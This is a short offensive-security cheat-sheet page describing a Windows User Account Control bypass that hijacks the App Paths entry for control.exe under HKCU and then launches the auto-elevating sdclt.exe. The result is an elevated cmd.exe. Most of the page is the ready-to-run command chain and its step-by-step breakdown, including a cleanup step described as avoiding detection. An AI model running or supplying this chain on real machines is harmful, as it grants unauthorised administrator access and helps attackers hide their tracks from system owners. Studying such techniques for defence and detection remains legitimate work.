UAC(User Account Control) Bypass via sdclt.exe and App Path Hijak
Command
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
How it Works
1. Registry Hijack
Adds a key to
App Paths
underHKCU
that changes howcontrol.exe
is resolvedInstead of launching the Control Panel it will launch
cmd.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f
2. Trigger Auto-Elevation
Launches
sdclt.exe
, a trusted Microsoft binary with auto-elevationsdclt.exe
internally attempts to launchcontrol.exe
, which due to the registry hijack actually launchescmd.exe
As a result
cmd.exe
runs with elevated privileges
START /W sdclt.exe
3. Cleanup
Deletes the hijacked registry key to avoid persistence or detection
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
seBackup seRestore seImpersonate setimezone
Last updated